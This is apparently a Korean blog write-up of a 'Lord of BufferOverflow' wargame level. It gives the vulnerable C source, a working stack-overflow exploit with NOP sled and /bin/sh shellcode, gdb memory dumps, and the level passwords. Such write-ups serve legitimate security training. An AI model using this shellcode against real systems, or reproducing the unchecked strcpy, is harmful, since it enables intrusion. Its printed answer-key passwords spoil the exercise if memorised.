login : darkelf
password : kernel crashed
/*
The Lord of the BOF : The Fellowship of the BOF
- orge
- check argv[0]
*/
#include <stdio.h>
#include <stdlib.h>
extern char **environ;
main(int argc, char *argv[])
{
char buffer[40];
int i;
if(argc < 2){
printf("argv error\n");
exit(0);
}
// here is changed!
if(strlen(argv[0]) != 77){
printf("argv[0] error\n");
exit(0);
}
// egghunter
for(i=0; environ[i]; i++)
memset(environ[i], 0, strlen(environ[i]));
if(argv[1][47] != '\xbf')
{
printf("stack is still your friend.\n");
exit(0);
}
// check the length of argument
if(strlen(argv[1]) > 48){
printf("argument is too long!\n");
exit(0);
}
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
// buffer hunter
memset(buffer, 0, 40);
}
here is changed! 가 추가되었다.
argv[0] 의 길이가 77이여야된다.
argv[0] 는 orge이니까 77개로 바꿔주기 위해서는 심볼릭 링크를 이용해야한다.
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa저건 삽질좀 하느라 만든건데 AAAAAAAAAAAAA로 풀겠다...
뻘짓하다가 1시간이나 풀게됬다....
파일권한상 orge를 복사해서 풀겠다
cp orge `python -c 'print "B"*75'`
`python -c 'print "./"+"B"*75'` `python -c 'print "\x90"*44+"\xbf\xbf\xbf\xbf"'` `python -c 'print "\x90"*100+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
코어파일이 생겼으니 코어파일을 gdb로 분석해보자
0xbffffaa0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffab0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffac0: 0x00000000 0x00000000 0x00000000 0x36383669
0xbffffad0: 0x422f2e00 0x42424242 0x42424242 0x42424242
0xbffffae0: 0x42424242 0x42424242 0x42424242 0x42424242
---Type <return> to continue, or q <return> to quit---
0xbffffaf0: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffffb00: 0x42424242 0x42424242 0x42424242 0x42424242
(gdb) x/100x 0xbffffb00
0xbffffb00: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffffb10: 0x42424242 0x42424242 0x42424242 0x90004242
0xbffffb20: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb30: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb40: 0x90909090 0x90909090 0xbf909090 0x00bfbfbf
0xbffffb50: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb60: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb70: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb80: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb90: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffba0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffbb0: 0x90909090 0x6850c031 0x68732f2f 0x69622f680xbffffad0 에 4242424242가 들어가는걸 보니 argv[0] BBBBBB이게 들어가고
0xbffffb20부터는 argv[1]인 909090
0xbffffb50줄부터는 argv[2]인 값이 들어가는걸 볼수 있다
리턴주소는 0xbffffbb0으로 잡고 넣었다.
`python -c 'print "./"+"A"*75'` `python -c 'print "\x90"*44+"\xb0\xfb\xff\xbf"'` `python -c 'print "\x90"*100+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
timewalker
'Write-Up > LOB(lord of bufferoverflow)' 카테고리의 다른 글
| [Lord Of BufferOverFlow] 9번 troll -> vampire (0) | 2021.02.26 |
|---|---|
| [Lord Of BufferOverFlow] 8번 orge -> troll (0) | 2021.02.26 |
| [Lord Of BufferOverFlow] 6번 wolfman -> darkelf (0) | 2021.02.25 |
| [Lord Of BufferOverFlow] 5번 orc -> wolfman (0) | 2021.02.25 |
| [Lord Of BufferOverFlow] 4번 goblin -> orc (0) | 2021.02.23 |
